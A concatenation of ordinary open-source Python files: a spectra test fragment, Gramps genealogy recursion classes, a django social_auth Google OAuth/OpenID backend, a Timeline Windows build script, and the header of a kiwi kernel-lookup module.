self.assertAlmostEqual(0.0, spectra.characteristicValue_1_ekeVsr(66.82), 12)
#self.fail("Test if the testcase is working.")
if __name__ == '__main__': #pragma: no cover
import nose
nose.runmodule()
| drix00/pymcxray | pymcxray/FileFormat/Results/test_XraySpectraRegionEmitted.py | Python | apache-2.0 | 13,861 |
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2015 Craig Anderson
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
""" Recursive base classes for reports
"""
from gramps.gen.plug.report import utils
from gramps.gen.lib import ChildRefType
#------------------------------------------------------------------------
#
# Livrecurse base objects only
#
#------------------------------------------------------------------------
class _PersonSeen:
""" librecurse base boject only
Keep track of people that have been seen so we can call the correct
virtual method.
"""
def __init__(self):
self.people_seen = set()
def add_person(self, level, person_handle, family_handle):
""" a person is seen for the first time """
pass
def add_person_again(self, level, person_handle, family_handle):
""" a person is seen again """
pass
def _add_person(self, level, person_handle, family_handle):
""" Which virtual method to call?
"""
if person_handle is not None and person_handle in self.people_seen:
self.add_person_again(level, person_handle, family_handle)
else:
self.add_person(level, person_handle, family_handle)
if person_handle is not None:
self.people_seen.add(person_handle)
class _FamilySeen:
""" librecurse base boject only
Keep track of the famalies that have been seen so we can call the correct
virtual method.
"""
def __init__(self):
self.families_seen = set()
def add_marriage(self, level, person_handle, family_handle):
""" Makes a marriage """
pass
def add_marriage_again(self, level, person_handle, family_handle):
""" Makes a marriage """
pass
def _add_marriage(self, level, person_handle, family_handle):
""" Makes a marriage """
if family_handle in self.families_seen:
self.add_marriage_again(level, person_handle, family_handle)
else:
self.add_marriage(level, person_handle, family_handle)
self.families_seen.add(family_handle)
class _StopRecurse:
""" A simple class to break out the
. stop_recursion
. can_recurse
. continue_recursion
methods
"""
def __init__(self):
# The default value. Lets recurse.
self.__stop_recursion = False
def stop_recursion(self):
""" Stop Recursion at theis person/family """
self.__stop_recursion = True
def continue_recursion(self):
""" Used to allow recursion again """
self.__stop_recursion = False
def can_recurse(self):
""" Has the upper class told up to stop or can we continue? """
return self.__stop_recursion == False
#------------------------------------------------------------------------
#
# Class DescendPerson
#
#------------------------------------------------------------------------
class DescendPerson(_StopRecurse, _PersonSeen, _FamilySeen):
""" Recursive (down) base class
The following methods need to be sub-classed as needed:
. add_person
. add_person_again (called when a person is seen a second or more times)
if you don't want to see marriages don't subclass the following two
. add_marriage
. add_marriage_again (when a marriage is seen a second or more times)
returns:
. add_person, add_person_again, add_marriage, add_marriage_again return
. . index -> a tuple in the form
. . . generation, which generational level >= 1
. . . level
. . . . 0 = A direct child
. . . . 1 = spouse of above (0)
. . . . 2 = spouse of 1
. . . . 3 = spouse of 2
. . . . 4 etc
. . person_handle
. . family_handle
Public variables:
. families_seen a set of all famalies seen.
. people_seen, a set of all people seen.
. . useful for knowing if a recursion (kid marring a grandparent)
. . has happened.
These can be edited if needed
. appending can be useful for excluding parts of the tree
Methods (tools):
is_direct_descendant - is this person a direct descendant
. in the example 'kid 1 of mom and other spouse' is NOT
stop_recursion - tells the recursion to stop going down
. mostly used in add_person_again and add_marriage_again
has_children - checks to see if the person:
. is NOT already seen and has hildren.
Methods (informative)
. These are the methods that need to be subclassed
. all methods are given the:
. . level in (Generagion, Spousal level) tuple
. . person_handle of the person
. . family_handle of the family
add_marriage
add_marriage_again
Virtual methods in PersonSeen
. add_person - The recursion found a new person in the tree
. add_person_again - found a person again
. . a prolific person or recursion
Methods (recursive)
recurse - The main recursive routine. needs:
. person_handle
. g_level - Generation level of this person
. . if max_gen is 2 and g_level is 1, only this generation
. . will be displayed.
. s_level - spousal level - most always 0
recurse_parents - Thes same as above except:
. mom (the spouse) is still shown even if s_level == 0
. . father will have a level of (g_level,0), mother (g_level, 1)
"""
def __init__(self, dbase, maxgen, maxspouse=0):
_PersonSeen.__init__(self)
_FamilySeen.__init__(self)
_StopRecurse.__init__(self)
""" initalized with the
. database
. maxgen is the max generations (down) of people to return
. maxspouse is the level of spouses to recruse through
. . 0 = no spouses, 1 = spouses of a direct descendant
. . 2 = spouses of 1, 3 = spouses of 2, etc. See example below
"""
# example: maxgen = 2, maxspouses = 2
# (1,0) father
# (1,1) Mother
# (1,2) Mothers other spouse
# (2,0) kid 1 of mom and other spouse
# (2,0) Kid 1 of father and mother
# (1,1) fathers other spouse
# (2,0) Kid 1 of father and fathers other spouse
# (2,1) Spouse of Kid 1 of father and fathers other spouse
self.database = dbase
assert maxgen > 0
self.max_generations = maxgen
assert maxspouse >= 0
self.max_spouses = maxspouse
#can we bold direct descendants?
#bold_now will have only three values
#0 - no bolding
#1 - Only bold the first person
#2 - Bold all direct descendants
self.__bold_now = 1
self.__this_slevel = -1
def is_direct_descendant(self):
""" Is this person a direct descendant?
. Can we bold this perosn and
. are they a direct child of the father/mother
. . not a spouse
"""
return self.__bold_now != 0 and self.__this_slevel == 0
def has_children(self, person_handle):
"""
Quickly check to see if this person has children
still we want to respect the people_seen list
"""
if not person_handle or person_handle in self.people_seen:
return False
person = self.database.get_person_from_handle(person_handle)
for family_handle in person.get_family_handle_list():
if family_handle not in self.families_seen:
family = self.database.get_family_from_handle(family_handle)
if family.get_child_ref_list():
return True
return False
def recurse(self, person_handle, g_level, s_level):
"""traverse the descendants recursively
until either the end of a line is found,
or until we reach the maximum number of generations
or we reach the max number of spouses
that we want to deal with"""
if not person_handle:
return
if g_level > self.max_generations:
return # one generation too many
if s_level > 0 and s_level == self.max_spouses:
return
#if person_handle in self.people_seen: return
person = self.database.get_person_from_handle(person_handle)
family_handles = person.get_family_handle_list()
if s_level == 0:
val = family_handles[0] if family_handles else None
self.__this_slevel = s_level
self._add_person((g_level, s_level), person_handle, val)
if self.__bold_now == 1:
self.__bold_now = 0
if not self.can_recurse():
self.continue_recursion()
return
if s_level == 1:
tmp_bold = self.__bold_now
self.__bold_now = 0
for family_handle in family_handles:
#Marriage box if the option is there.
self._add_marriage((g_level, s_level + 1),
person_handle, family_handle)
if not self.can_recurse():
self.continue_recursion()
return
family = self.database.get_family_from_handle(family_handle)
spouse_handle = utils.find_spouse(person, family)
if self.max_spouses > s_level:
self.__this_slevel = s_level + 1
self._add_person((g_level, s_level + 1),
spouse_handle, family_handle)
if not self.can_recurse:
self.continue_recursion()
return
mykids = [kid.ref for kid in family.get_child_ref_list()]
if self.can_recurse():
for child_ref in mykids:
self.recurse(child_ref, g_level + 1, 0)
else:
self.continue_recursion()
if self.max_spouses > s_level:
#spouse_handle = utils.find_spouse(person,family)
self.recurse(spouse_handle, g_level, s_level + 1)
if s_level == 1:
self.__bold_now = tmp_bold
def recurse_parents(self, family_handle, g_level):
"""
Adds a family.
ignoring maxspouse, s_level assumed 0 and 1
father is (g_level,0) and mother is (g_level,1)
children are (g_level+1,0) and respects maxgen
"""
if family_handle is None:
return
family = self.database.get_family_from_handle(family_handle)
father_h = family.get_father_handle()
mother_h = family.get_mother_handle()
self.__bold_now = 2
self.__this_slevel = 0
#if father_h:
father_b = self._add_person((g_level, 0), father_h, family_handle)
#else:
# #TODO - should send family_h instead of None?
# father_b = self._add_person((g_level, 0), None, family_h)
#self.people_seen.add(father_h)
family_b = self._add_marriage((g_level, 1), father_h, family_handle)
self.__bold_now = 0
self.__this_slevel = 1
mother_b = self._add_person((g_level, 1), mother_h, family_handle)
self.__bold_now = 2
for child_ref in family.get_child_ref_list():
self.recurse(child_ref.ref, g_level + 1, 0)
self.__bold_now = 0
return (father_b, family_b, mother_b)
def recurse_if(self, person_handle, g_level):
"""
Quickly check to see if we want to continue recursion
we still we want to respect the FamiliesSeen list
"""
person = self.database.get_person_from_handle(person_handle)
show = False
myfams = person.get_family_handle_list()
if len(myfams) > 1: # and self.max_spouses > 0
show = True
#if self.max_spouses == 0 and not self.has_children(person_handle):
# self.people_seen.add(person_handle)
# show = False
if show:
self.__bold_now = 1
self.recurse(person_handle, g_level, 0)
#------------------------------------------------------------------------
#
# Class AscendPerson
#
#------------------------------------------------------------------------
class AscendPerson(_StopRecurse, _PersonSeen):
""" Recursive (up) base class
The following methods need to be sub-classed as needed:
. add_person
. add_person_again (called when a person is seen a second or more times)
if you don't want to see marriages don't subclass the following
. add_marriage
. . index (below) will be the same as the father
returns:
. add_person, add_person_again, add_marriage all return
. . index -> a tuple in the form
. . . generation, which generational level >= 1
. . . . Center person is 1
. . . . Father/Mother is the generational level of the child + 1
. . . index
. . . . The center person is 1
. . . . A father is the index of the child * 2
. . . . A mother is the (index of the child * 2) + 1
. . person_handle (May be None)
. . family_handle (May be None)
Public variables:
. people_seen, a set of all people seen.
. . useful for knowing if a recursion (kid marring a grandparent)
. . has happened.
These can be edited if needed
. people_seen, a set of all people seen.
. . appending can be useful for excluding parts of the tree
"""
def __init__(self, dbase, maxgen, maxfill=0):
_PersonSeen.__init__(self)
_StopRecurse.__init__(self)
""" initalized with the
. database
. maxgen is the max generations (up) of people to return
. . maxgen >= 1. 1 will only be the person.
. maxfill is the max generations of blank (null) people to return
. . maxfil >= 0. 0 (default) is no empty generations
"""
self.database = dbase
assert maxgen > 0
self.max_generations = maxgen
assert maxfill >= 0
self.fill_out = maxfill
def add_marriage(self, index, indi_handle, fams_handle):
""" Makes a marriage box and add that person into the Canvas. """
# We are not using add_marriage only and not add_marriage_again
# because the father will do any _again stuff if needed.
pass
def __fill(self, generation, index, mx_fill):
"""
A skeleton of __iterate as person_handle == family_handle == None
"""
if generation > self.max_generations or mx_fill == 0:
# Gone too far.
return
self.add_person((generation, index), None, None)
if not self.can_recurse():
self.continue_recursion()
return
# Recursively call the function. It is okay if the handle is None,
# since routine handles a handle of None
self.__fill(generation+1, index*2, mx_fill-1)
if mx_fill > 1: # marriage of parents
self.add_marriage((generation+1, index*2), None, None)
if not self.can_recurse():
self.continue_recursion()
return
self.__fill(generation+1, (index*2)+1, mx_fill-1)
def __iterate(self, generation, index, person_handle, full_family_handle):
"""
Recursive function to walk back all parents of the current person.
When max_generations are hit, we stop the traversal.
Code pilfered from gramps/plugins/textreports/ancestorreport.py
"""
# check for end of the current recursion level. This happens
# if the person handle is None, or if the max_generations is hit
if generation > self.max_generations: # too many generations
return
if person_handle is None: # Ran out of people
return self.__fill(generation, index, self.fill_out)
# retrieve the Person instance from the database from the
# passed person_handle and find the parents from the list.
# Since this report is for natural parents (birth parents),
# we have to handle that parents may not
person = self.database.get_person_from_handle(person_handle)
# we have a valid person, add him/her
self._add_person((generation, index), person_handle, full_family_handle)
# has the user canceled recursion?
if not self.can_recurse():
self.continue_recursion()
return
#Now recurse on the parents
family_handle = person.get_main_parents_family_handle()
if family_handle is not None:
family = self.database.get_family_from_handle(family_handle)
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
else:
father_handle = None
mother_handle = None
# Recursively call the function. It is okay if the handle is None,
self.__iterate(generation+1, index*2, father_handle, family_handle) #recurse on dad
if generation < self.max_generations:
if father_handle is not None: # Stil winin max_generations
self.add_marriage((generation+1, index*2), father_handle, family_handle)
elif mother_handle is not None:
self.add_marriage((generation+1, index*2), mother_handle, family_handle)
elif family_handle is not None:
self.add_marriage((generation+1, index*2), None, family_handle)
elif self.fill_out > 0:
self.add_marriage((generation+1, index*2), None, None)
if not self.can_recurse():
self.continue_recursion()
return
self.__iterate(generation+1, (index*2)+1, mother_handle, family_handle) #recurse mom
def recurse(self, person_handle):
"""
A simple header to make sure we pass in the correct information
"""
return self.__iterate(1, 1, person_handle, None)
#------------
# Jer 29:11: "For I know the plans I have for you," declares the LORD,
# "plans to prosper you and not to harm you, plans to give you hope
# and a future."
| beernarrd/gramps | gramps/plugins/lib/librecurse.py | Python | gpl-2.0 | 18,750 |
"""
Google OpenID and OAuth support
OAuth works straightforward using anonymous configurations, username
is generated by requesting email to the not documented, googleapis.com
service. Registered applications can define settings GOOGLE_CONSUMER_KEY
and GOOGLE_CONSUMER_SECRET and they will be used in the auth process.
Setting GOOGLE_OAUTH_EXTRA_SCOPE can be used to access different user
related data, like calendar, contacts, docs, etc.
OAuth2 works similar to OAuth but application must be defined on Google
APIs console https://code.google.com/apis/console/ Identity option.
OpenID also works straightforward, it doesn't need further configurations.
"""
from urllib import urlencode
from urllib2 import Request, urlopen
from oauth2 import Request as OAuthRequest
from django.utils import simplejson
from social_auth.utils import setting
from social_auth.backends import OpenIdAuth, ConsumerBasedOAuth, BaseOAuth2, \
OAuthBackend, OpenIDBackend, USERNAME
from social_auth.backends.exceptions import AuthFailed
# Google OAuth base configuration
GOOGLE_OAUTH_SERVER = 'www.google.com'
AUTHORIZATION_URL = 'https://www.google.com/accounts/OAuthAuthorizeToken'
REQUEST_TOKEN_URL = 'https://www.google.com/accounts/OAuthGetRequestToken'
ACCESS_TOKEN_URL = 'https://www.google.com/accounts/OAuthGetAccessToken'
# Google OAuth2 base configuration
GOOGLE_OAUTH2_SERVER = 'accounts.google.com'
GOOGLE_OATUH2_AUTHORIZATION_URL = 'https://accounts.google.com/o/oauth2/auth'
# scope for user email, specify extra scopes in settings, for example:
# GOOGLE_OAUTH_EXTRA_SCOPE = ['https://www.google.com/m8/feeds/']
GOOGLE_OAUTH_SCOPE = ['https://www.googleapis.com/auth/userinfo#email']
GOOGLE_OAUTH2_SCOPE = ['https://www.googleapis.com/auth/userinfo.email',
'https://www.googleapis.com/auth/userinfo.profile']
GOOGLEAPIS_EMAIL = 'https://www.googleapis.com/userinfo/email'
GOOGLEAPIS_PROFILE = 'https://www.googleapis.com/oauth2/v1/userinfo'
GOOGLE_OPENID_URL = 'https://www.google.com/accounts/o8/id'
# Backends
class GoogleOAuthBackend(OAuthBackend):
"""Google OAuth authentication backend"""
name = 'google-oauth'
def get_user_id(self, details, response):
"""Use google email as unique id"""
validate_whitelists(self, details['email'])
return details['email']
def get_user_details(self, response):
"""Return user details from Orkut account"""
email = response['email']
return {USERNAME: email.split('@', 1)[0],
'email': email,
'fullname': '',
'first_name': '',
'last_name': ''}
class GoogleOAuth2Backend(GoogleOAuthBackend):
"""Google OAuth2 authentication backend"""
name = 'google-oauth2'
EXTRA_DATA = [
('refresh_token', 'refresh_token', True),
('expires_in', setting('SOCIAL_AUTH_EXPIRATION', 'expires'))
]
def get_user_id(self, details, response):
"""Use google email or id as unique id"""
user_id = super(GoogleOAuth2Backend, self).get_user_id(details,
response)
if setting('GOOGLE_OAUTH2_USE_UNIQUE_USER_ID', False):
return response['id']
return user_id
def get_user_details(self, response):
email = response['email']
return {USERNAME: email.split('@', 1)[0],
'email': email,
'fullname': response.get('name', ''),
'first_name': response.get('given_name', ''),
'last_name': response.get('family_name', '')}
class GoogleBackend(OpenIDBackend):
"""Google OpenID authentication backend"""
name = 'google'
def get_user_id(self, details, response):
"""
Return user unique id provided by service. For google user email
is unique enought to flag a single user. Email comes from schema:
http://axschema.org/contact/email
"""
validate_whitelists(self, details['email'])
return details['email']
# Auth classes
class GoogleAuth(OpenIdAuth):
"""Google OpenID authentication"""
AUTH_BACKEND = GoogleBackend
def openid_url(self):
"""Return Google OpenID service url"""
return GOOGLE_OPENID_URL
class BaseGoogleOAuth(ConsumerBasedOAuth):
"""Base class for Google OAuth mechanism"""
AUTHORIZATION_URL = AUTHORIZATION_URL
REQUEST_TOKEN_URL = REQUEST_TOKEN_URL
ACCESS_TOKEN_URL = ACCESS_TOKEN_URL
SERVER_URL = GOOGLE_OAUTH_SERVER
def user_data(self, access_token, *args, **kwargs):
"""Loads user data from G service"""
raise NotImplementedError('Implement in subclass')
class GoogleOAuth(BaseGoogleOAuth):
"""Google OAuth authorization mechanism"""
AUTH_BACKEND = GoogleOAuthBackend
SETTINGS_KEY_NAME = 'GOOGLE_CONSUMER_KEY'
SETTINGS_SECRET_NAME = 'GOOGLE_CONSUMER_SECRET'
def user_data(self, access_token, *args, **kwargs):
"""Return user data from Google API"""
request = self.oauth_request(access_token, GOOGLEAPIS_EMAIL,
{'alt': 'json'})
url, params = request.to_url().split('?', 1)
return googleapis_email(url, params)
def oauth_authorization_request(self, token):
"""Generate OAuth request to authorize token."""
return OAuthRequest.from_consumer_and_token(self.consumer,
token=token,
http_url=self.AUTHORIZATION_URL)
def oauth_request(self, token, url, extra_params=None):
extra_params = extra_params or {}
scope = GOOGLE_OAUTH_SCOPE + setting('GOOGLE_OAUTH_EXTRA_SCOPE', [])
extra_params.update({
'scope': ' '.join(scope),
})
if not self.registered():
xoauth_displayname = setting('GOOGLE_DISPLAY_NAME', 'Social Auth')
extra_params['xoauth_displayname'] = xoauth_displayname
return super(GoogleOAuth, self).oauth_request(token, url, extra_params)
@classmethod
def get_key_and_secret(cls):
"""Return Google OAuth Consumer Key and Consumer Secret pair, uses
anonymous by default, beware that this marks the application as not
registered and a security badge is displayed on authorization page.
http://code.google.com/apis/accounts/docs/OAuth_ref.html#SigningOAuth
"""
try:
return super(GoogleOAuth, cls).get_key_and_secret()
except AttributeError:
return 'anonymous', 'anonymous'
@classmethod
def enabled(cls):
"""Google OAuth is always enabled because of anonymous access"""
return True
def registered(self):
"""Check if Google OAuth Consumer Key and Consumer Secret are set"""
return self.get_key_and_secret() != ('anonymous', 'anonymous')
# TODO: Remove this setting name check, keep for backward compatibility
_OAUTH2_KEY_NAME = setting('GOOGLE_OAUTH2_CLIENT_ID') and \
'GOOGLE_OAUTH2_CLIENT_ID' or \
'GOOGLE_OAUTH2_CLIENT_KEY'
class GoogleOAuth2(BaseOAuth2):
"""Google OAuth2 support"""
AUTH_BACKEND = GoogleOAuth2Backend
AUTHORIZATION_URL = 'https://accounts.google.com/o/oauth2/auth'
ACCESS_TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'
SETTINGS_KEY_NAME = _OAUTH2_KEY_NAME
SETTINGS_SECRET_NAME = 'GOOGLE_OAUTH2_CLIENT_SECRET'
SCOPE_VAR_NAME = 'GOOGLE_OAUTH_EXTRA_SCOPE'
DEFAULT_SCOPE = GOOGLE_OAUTH2_SCOPE
REDIRECT_STATE = False
def user_data(self, access_token, *args, **kwargs):
"""Return user data from Google API"""
return googleapis_profile(GOOGLEAPIS_PROFILE, access_token)
def googleapis_email(url, params):
"""Loads user data from googleapis service, only email so far as it's
described in http://sites.google.com/site/oauthgoog/Home/emaildisplayscope
Parameters must be passed in queryset and Authorization header as described
on Google OAuth documentation at:
http://groups.google.com/group/oauth/browse_thread/thread/d15add9beb418ebc
and: http://code.google.com/apis/accounts/docs/OAuth2.html#CallingAnAPI
"""
request = Request(url + '?' + params, headers={'Authorization': params})
try:
return simplejson.loads(urlopen(request).read())['data']
except (ValueError, KeyError, IOError):
return None
def googleapis_profile(url, access_token):
"""
Loads user data from googleapis service, such as name, given_name,
family_name, etc. as it's described in:
https://developers.google.com/accounts/docs/OAuth2Login
"""
data = {'access_token': access_token, 'alt': 'json'}
request = Request(url + '?' + urlencode(data))
try:
return simplejson.loads(urlopen(request).read())
except (ValueError, KeyError, IOError):
return None
def validate_whitelists(backend, email):
"""
Validates allowed domains and emails against the following settings:
GOOGLE_WHITE_LISTED_DOMAINS
GOOGLE_WHITE_LISTED_EMAILS
All domains and emails are allowed if setting is an empty list.
"""
emails = setting('GOOGLE_WHITE_LISTED_EMAILS', [])
domains = setting('GOOGLE_WHITE_LISTED_DOMAINS', [])
if emails and email in emails:
return # you're good
if domains and email.split('@', 1)[1] not in domains:
raise AuthFailed(backend, 'Domain not allowed')
# Backend definition
BACKENDS = {
'google': GoogleAuth,
'google-oauth': GoogleOAuth,
'google-oauth2': GoogleOAuth2,
}
| marco-lancini/Showcase | social_auth/backends/google.py | Python | mit | 9,593 |
# Copyright (C) 2009, 2010, 2011 Rickard Lindberg, Roger Lindberg
#
# This file is part of Timeline.
#
# Timeline is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Timeline is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Timeline. If not, see <http://www.gnu.org/licenses/>.
"""
Working directory = BUILD_DIR
COPYDIR Copies from TIMELINE_DIR to BUILD_DIR
"""
import sys
import os
import shutil
import subprocess
TIMELINE_DIR = os.path.abspath("..\\..\\")
BUILD_DIR = os.path.abspath(".\\target")
COPYFILE = 0
COPYDIR = 1
MAKEDIR = 2
PUSHD = 3
POPD = 4
RUNCMD = 5
RUNPYSCRIPT = 6
CPYDIR = 7
ANNOTATE = 8
RUNPYTEST = 9
ACTION_NAMES = {COPYFILE: "COPYFILE",
COPYDIR: "COPYDIR",
MAKEDIR: "MAKEDIR",
PUSHD: "PUSHD",
POPD: "POPD",
RUNCMD: "RUNCMD",
RUNPYSCRIPT: "RUNPYSCRIPT",
RUNPYTEST: "RUNPYTEST",
CPYDIR: "CPYDIR", }
known_targets = ("win32", "win32py25", "source")
win32_actions = ((ANNOTATE, "Modify some python files", ""),
(COPYDIR, r"release\win\cmd", "cmd"),
(COPYFILE, r"source\timeline.py", "timeline.py"),
(RUNPYSCRIPT, r"cmd\mod2_timeline_py.py", ""),
(COPYDIR, r"source\timelinelib", "timelinelib"),
(RUNPYSCRIPT, r"cmd\mod2_paths_py.py", ""),
(RUNPYSCRIPT, r"cmd\mod2_version_py.py", ""),
(RUNPYSCRIPT, r"cmd\mod2_factory_py.py", ""),
(MAKEDIR, None, "inno"),
(COPYFILE, r"release\win\inno\timelineWin32_2.iss", r"inno\timelineWin32_2.iss"),
(RUNPYSCRIPT, r"cmd\mod2_timeline_iss_win32.py", ""),
(ANNOTATE, "Run Tests", ""),
(PUSHD, "..\\..\\..\\", ""),
# (RUNPYTEST, r"test\execute-specs.py", ""),
# (RUNPYTEST, r"test\execute-specs-repeat.py", ""),
(POPD, "", ""),
(ANNOTATE, "Library dependencies", ""),
(COPYDIR, r"dependencies\timelinelib\icalendar-3.2\icalendar", "icalendar"),
(COPYDIR, r"dependencies\timelinelib\pytz-2012j\pytz", "pytz"),
(COPYDIR, r"dependencies\timelinelib\pysvg-0.2.1\pysvg", "pysvg"),
(COPYDIR, r"dependencies\timelinelib\markdown-2.0.3\markdown", "markdown"),
(ANNOTATE, "Create distribution directory", ""),
(COPYFILE, r"release\win\inno\setup.py", "setup.py"),
(MAKEDIR, None, "icons"),
(COPYFILE, r"release\win\inno\Timeline.ico", r"icons\Timeline.ico"),
(RUNPYSCRIPT, "setup.py", "py2exe"),
(ANNOTATE, "Create distribution executable", ""),
(COPYFILE, "SConstruct", "SConstruct"),
(COPYDIR, "po", "po"),
(RUNCMD, "scons.bat", ""),
(CPYDIR, "po", r"dist\po"),
(COPYDIR, "icons", r"dist\icons"),
(COPYFILE, r"release\win\inno\Timeline.ico", r"dist\icons\Timeline.ico"),
(COPYFILE, "COPYING", "COPYING"),
(COPYFILE, r"release\win\inno\WINSTALL", r"WINSTALL"),
(ANNOTATE, "Create Setup executable", ""),
(RUNCMD, "iscc.exe", r"inno\timelineWin32_2.iss"),
(ANNOTATE, "Done", ""),
)
win32py25_actions = ( # Modify some python files
(COPYDIR, r"release\win\cmd", "cmd"),
(COPYFILE, r"source\timeline.py", "timeline.py"),
(RUNPYSCRIPT, r"cmd\mod2_timeline_py.py", ""),
(COPYDIR, r"source\timelinelib", "timelinelib"),
(RUNPYSCRIPT, r"cmd\mod2_paths_py.py", ""),
(RUNPYSCRIPT, r"cmd\mod2_version_py.py", ""),
(RUNPYSCRIPT, r"cmd\mod2_factory_py.py", ""),
(MAKEDIR, None, "inno"),
(COPYFILE, r"release\win\inno\timelineWin32_py25.iss", r"inno\timelineWin32_2.iss"),
(RUNPYSCRIPT, r"cmd\mod2_timeline_iss_win32.py", ""),
# Library dependencies
(COPYDIR, r"dependencies\timelinelib\icalendar-3.2\icalendar", "icalendar"),
(COPYDIR, r"dependencies\timelinelib\pytz-2012j\pytz", "pytz"),
(COPYDIR, r"dependencies\timelinelib\pysvg-0.2.1\pysvg", "pysvg"),
(COPYDIR, r"dependencies\timelinelib\markdown-2.0.3\markdown", "markdown"),
# Create distribution directory
(COPYFILE, r"release\win\inno\setup.py", "setup.py"),
(MAKEDIR, None, "icons"),
(COPYFILE, r"release\win\inno\Timeline.ico", r"icons\Timeline.ico"),
(RUNPYSCRIPT, "setup.py", "py2exe"),
# Create distribution executable
(COPYFILE, "SConstruct", "SConstruct"),
(COPYDIR, "po", "po"),
(RUNCMD, "scons.bat", ""),
(CPYDIR, "po", r"dist\po"),
(COPYDIR, "icons", r"dist\icons"),
(COPYFILE, r"release\win\inno\Timeline.ico", r"dist\icons\Timeline.ico"),
(COPYFILE, "COPYING", "COPYING"),
(COPYFILE, r"release\win\inno\WINSTALL", r"WINSTALL"),
# Create setup executable
(RUNCMD, "iscc.exe", r"inno\timelineWin32_2.iss"),
)
source_actions = ( # Change working dir to TIMELINE_DIR
(PUSHD, TIMELINE_DIR, None),
# Create source release artifact
(RUNPYTEST, "release\make-source-release.py", ""),
# Restore working dir
(POPD, None, None),
)
actions = {"win32": win32_actions,
"win32py25": win32py25_actions,
"source": source_actions}
class Target():
def __init__(self, target):
print "-------------------------------------------------------"
print " %s" % ("Building target %s" % target)
print "-------------------------------------------------------"
self.target = target
self.actions = actions[target]
self.ACTION_METHODS = {COPYFILE: self.copyfile,
COPYDIR: self.copydir,
MAKEDIR: self.makedir,
PUSHD: self.pushd,
POPD: self.popd,
RUNCMD: self.runcmd,
RUNPYSCRIPT: self.runpyscript,
RUNPYTEST: self.runpytest,
CPYDIR: self.cpydir,
ANNOTATE: self.annotate}
def build(self):
self.define_root_dirs()
self.create_target_dir()
self.execute_actions()
def define_root_dirs(self):
self.timeline_dir = TIMELINE_DIR
self.build_dir = os.path.abspath(".\\target")
print "Source in %s" % self.timeline_dir
print "Target in %s" % os.getcwd()
def create_target_dir(self):
print "Deleting old target"
if os.path.exists(self.build_dir):
shutil.rmtree(self.build_dir)
print "Creating target dir"
os.mkdir(self.build_dir)
os.chdir(self.build_dir)
self.cwd = os.getcwd()
def execute_actions(self):
count = 0
total = len([actions for action in self.actions if action[0] is not ANNOTATE])
try:
for action, src, dst in self.actions:
if action is not ANNOTATE:
count += 1
print "Action %2d(%2d): %s" % (count, total, ACTION_NAMES[action])
self.ACTION_METHODS[action](src, dst)
print "BUILD DONE"
except Exception, ex:
print str(ex)
print "BUILD FAILED"
def annotate(self, src, dst):
self.print_header(src)
def copyfile(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
shutil.copyfile(os.path.join(self.timeline_dir, src), dst)
def copydir(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
shutil.copytree(os.path.join(self.timeline_dir, src), os.path.join(dst))
def cpydir(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
shutil.copytree(os.path.join(src), os.path.join(dst))
def makedir(self, src, dst):
self.print_src_dst(None, dst)
print " dst: %s" % os.path.abspath(dst)
os.mkdir(os.path.join(self.build_dir, dst))
def runpyscript(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
success, msg = self.run_pyscript(src, [dst])
if not success:
raise Exception(msg)
def runpytest(self, src, dst):
self.print_src_dst(src, os.path.abspath(dst))
success, msg = self.run_pyscript(src, [dst], display_stderr=True)
if not success:
raise Exception(msg)
def runcmd(self, src, dst):
self.print_src_dst(src, dst)
success, msg = self.run_command([src, dst])
if not success:
raise Exception(msg)
def pushd(self, src, dst):
self.print_src_dst(os.getcwd(), os.path.abspath(src))
self.cwd = os.getcwd()
os.chdir(src)
def popd(self, src, dst):
self.print_src_dst(None, self.cwd)
print " dst: %s" % self.cwd
os.chdir(self.cwd)
def run_pyscript(self, script, args=[], display_stderr=False):
return self.run_command(["python", script] + args, display_stderr)
def run_command(self, cmd, display_stderr=False):
if display_stderr:
rc = subprocess.call(cmd)
return rc == 0, ""
else:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = p.communicate()
if p.returncode == 0:
return True, out[0]
else:
return False, out[1]
def print_header(self, message):
print "-------------------------------------------------------"
print " %s" % message
print "-------------------------------------------------------"
def print_src_dst(self, src, dst):
if src is not None:
print " src: %s" % src
if dst is not None:
print " dst: %s" % dst
def main():
if len(sys.argv) == 1:
print "A target-name must be given as an argument"
else:
target = sys.argv[1]
if target not in known_targets:
print "%s is an unknown target" % target
else:
Target(target).build()
if __name__ == "__main__":
main()
| linostar/timeline-clone | release/buildtool/build.py | Python | gpl-3.0 | 11,324 |
# Copyright (c) 2015 SUSE Linux GmbH. All rights reserved.
#
# This file is part of kiwi.
#
# kiwi is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# kiwi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with kiwi. If not, see <http://www.gnu.org/licenses/>
#
import os
import re
from collections import namedtuple
# project
from kiwi.command import Command
from kiwi.exceptions import KiwiKernelLookupError
class Kernel:
"""
**Implementes kernel lookup and extraction from given root tree**
:param str root_dir: root directory path name
:param list kernel_names: list of kernel names to search for
functions.sh::suseStripKernel() provides a normalized
file so that we do not have to search for many different
names in this code
"""
